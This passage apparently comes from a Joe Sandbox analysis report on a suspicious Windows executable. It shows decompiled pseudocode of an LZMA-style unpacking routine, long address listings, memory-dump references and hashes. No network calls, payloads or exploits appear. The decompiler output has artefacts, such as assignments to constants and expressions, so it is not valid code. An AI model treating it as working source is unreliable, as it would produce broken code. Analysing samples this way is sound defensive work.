                          							 *(__ebp - 0x10) = __ecx;
                          							0x800 = 0x800 - __edi;
                          							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          							 *__esi = __cx;
                          						}
                          						if( *(__ebp - 0x10) >= 0x1000000) {
                          							goto L148;
                          						} else {
                          							goto L146;
                          						}
                          					}
                          					goto L1;
                          				}
                          			}








                          0x00000000
                          0x00406682
                          0x00406682
                          0x00406686
                          0x004066ab
                          0x004066b5
                          0x00000000
                          0x00406688
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406695
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00406776
                          0x00406776
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00406734
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x00000000
                          0x004068bc
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x00000000
                          0x004060d9
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x00000000
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x00406424
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00000000
                          0x0040676f
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00406734
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x00000000
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x004068d2
                          0x004068d8
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00406811
                          0x00000000
                          0x00406686

                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                          • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                          • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                          • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406398() {
                          				unsigned short _t532;
                          				signed int _t533;
                          				void _t534;
                          				void* _t535;
                          				signed int _t536;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t589;
                          				signed int* _t606;
                          				void* _t613;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t613 - 0x40) != 0) {
                          						L89:
                          						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                          						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                          						L69:
                          						_t606 =  *(_t613 - 0x58);
                          						 *(_t613 - 0x84) = 0x12;
                          						L132:
                          						 *(_t613 - 0x54) = _t606;
                          						L133:
                          						_t532 =  *_t606;
                          						_t589 = _t532 & 0x0000ffff;
                          						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          						if( *(_t613 - 0xc) >= _t565) {
                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          							 *(_t613 - 0x40) = 1;
                          							_t533 = _t532 - (_t532 >> 5);
                          							 *_t606 = _t533;
                          						} else {
                          							 *(_t613 - 0x10) = _t565;
                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                          						}
                          						if( *(_t613 - 0x10) >= 0x1000000) {
                          							L139:
                          							_t534 =  *(_t613 - 0x84);
                          							L140:
                          							 *(_t613 - 0x88) = _t534;
                          							goto L1;
                          						} else {
                          							L137:
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 5;
                          								goto L170;
                          							}
                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          							goto L139;
                          						}
                          					} else {
                          						if( *(__ebp - 0x60) == 0) {
                          							L171:
                          							_t536 = _t535 | 0xffffffff;
                          							L172:
                          							return _t536;
                          						}
                          						__eax = 0;
                          						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          						0 | _t258 = _t258 + _t258 + 9;
                          						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          						L75:
                          						if( *(__ebp - 0x64) == 0) {
                          							 *(__ebp - 0x88) = 0x1b;
                          							L170:
                          							_t568 = 0x22;
                          							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                          							_t536 = 0;
                          							goto L172;
                          						}
                          						__eax =  *(__ebp - 0x14);
                          						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          						if(__eax >=  *(__ebp - 0x74)) {
                          							__eax = __eax +  *(__ebp - 0x74);
                          						}
                          						__edx =  *(__ebp - 8);
                          						__cl =  *(__eax + __edx);
                          						__eax =  *(__ebp - 0x14);
                          						 *(__ebp - 0x5c) = __cl;
                          						 *(__eax + __edx) = __cl;
                          						__eax = __eax + 1;
                          						__edx = 0;
                          						_t274 = __eax %  *(__ebp - 0x74);
                          						__eax = __eax /  *(__ebp - 0x74);
                          						__edx = _t274;
                          						__eax =  *(__ebp - 0x68);
                          						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          						_t283 = __ebp - 0x64;
                          						 *_t283 =  *(__ebp - 0x64) - 1;
                          						 *( *(__ebp - 0x68)) = __cl;
                          						L79:
                          						 *(__ebp - 0x14) = __edx;
                          						L80:
                          						 *(__ebp - 0x88) = 2;
                          					}
                          					L1:
                          					_t535 =  *(_t613 - 0x88);
                          					if(_t535 > 0x1c) {
                          						goto L171;
                          					}
                          					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
                          						case 0:
                          							if( *(_t613 - 0x6c) == 0) {
                          								goto L170;
                          							}
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							_t535 =  *( *(_t613 - 0x70));
                          							if(_t535 > 0xe1) {
                          								goto L171;
                          							}
                          							_t539 = _t535 & 0x000000ff;
                          							_push(0x2d);
                          							asm("cdq");
                          							_pop(_t570);
                          							_push(9);
                          							_pop(_t571);
                          							_t609 = _t539 / _t570;
                          							_t541 = _t539 % _t570 & 0x000000ff;
                          							asm("cdq");
                          							_t604 = _t541 % _t571 & 0x000000ff;
                          							 *(_t613 - 0x3c) = _t604;
                          							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                          							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                          							_t612 = (0x300 << _t604 + _t609) + 0x736;
                          							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                          								L10:
                          								if(_t612 == 0) {
                          									L12:
                          									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          									goto L15;
                          								} else {
                          									goto L11;
                          								}
                          								do {
                          									L11:
                          									_t612 = _t612 - 1;
                          									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                          								} while (_t612 != 0);
                          								goto L12;
                          							}
                          							if( *(_t613 - 4) != 0) {
                          								GlobalFree( *(_t613 - 4));
                          							}
                          							_t535 = GlobalAlloc(0x40, 0x600); // executed
                          							 *(_t613 - 4) = _t535;
                          							if(_t535 == 0) {
                          								goto L171;
                          							} else {
                          								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                          								goto L10;
                          							}
                          						case 1:
                          							L13:
                          							__eflags =  *(_t613 - 0x6c);
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 1;
                          								goto L170;
                          							}
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							_t45 = _t613 - 0x48;
                          							 *_t45 =  *(_t613 - 0x48) + 1;
                          							__eflags =  *_t45;
                          							L15:
                          							if( *(_t613 - 0x48) < 4) {
                          								goto L13;
                          							}
                          							_t547 =  *(_t613 - 0x40);
                          							if(_t547 ==  *(_t613 - 0x74)) {
                          								L20:
                          								 *(_t613 - 0x48) = 5;
                          								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                          								goto L23;
                          							}
                          							 *(_t613 - 0x74) = _t547;
                          							if( *(_t613 - 8) != 0) {
                          								GlobalFree( *(_t613 - 8));
                          							}
                          							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                          							 *(_t613 - 8) = _t535;
                          							if(_t535 == 0) {
                          								goto L171;
                          							} else {
                          								goto L20;
                          							}
                          						case 2:
                          							L24:
                          							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                          							 *(_t613 - 0x84) = 6;
                          							 *(_t613 - 0x4c) = _t554;
                          							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                          							goto L132;
                          						case 3:
                          							L21:
                          							__eflags =  *(_t613 - 0x6c);
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 3;
                          								goto L170;
                          							}
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							_t67 = _t613 - 0x70;
                          							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                          							__eflags =  *_t67;
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          							L23:
                          							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                          							if( *(_t613 - 0x48) != 0) {
                          								goto L21;
                          							}
                          							goto L24;
                          						case 4:
                          							goto L133;
                          						case 5:
                          							goto L137;
                          						case 6:
                          							__edx = 0;
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x34) = 1;
                          								 *(__ebp - 0x84) = 7;
                          								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          							__esi =  *(__ebp - 0x60);
                          							__cl = 8;
                          							__cl = 8 -  *(__ebp - 0x3c);
                          							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          							__ecx =  *(__ebp - 0x3c);
                          							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          							__ecx =  *(__ebp - 4);
                          							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          							__eflags =  *(__ebp - 0x38) - 4;
                          							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          							if( *(__ebp - 0x38) >= 4) {
                          								__eflags =  *(__ebp - 0x38) - 0xa;
                          								if( *(__ebp - 0x38) >= 0xa) {
                          									_t98 = __ebp - 0x38;
                          									 *_t98 =  *(__ebp - 0x38) - 6;
                          									__eflags =  *_t98;
                          								} else {
                          									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          								}
                          							} else {
                          								 *(__ebp - 0x38) = 0;
                          							}
                          							__eflags =  *(__ebp - 0x34) - __edx;
                          							if( *(__ebp - 0x34) == __edx) {
                          								__ebx = 0;
                          								__ebx = 1;
                          								goto L61;
                          							} else {
                          								__eax =  *(__ebp - 0x14);
                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          								__eflags = __eax -  *(__ebp - 0x74);
                          								if(__eax >=  *(__ebp - 0x74)) {
                          									__eax = __eax +  *(__ebp - 0x74);
                          									__eflags = __eax;
                          								}
                          								__ecx =  *(__ebp - 8);
                          								__ebx = 0;
                          								__ebx = 1;
                          								__al =  *((intOrPtr*)(__eax + __ecx));
                          								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          								goto L41;
                          							}
                          						case 7:
                          							__eflags =  *(__ebp - 0x40) - 1;
                          							if( *(__ebp - 0x40) != 1) {
                          								__eax =  *(__ebp - 0x24);
                          								 *(__ebp - 0x80) = 0x16;
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x28);
                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          								__eax =  *(__ebp - 0x2c);
                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          								__eax = 0;
                          								__eflags =  *(__ebp - 0x38) - 7;
                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          								__al = __al & 0x000000fd;
                          								__eax = (__eflags >= 0) - 1 + 0xa;
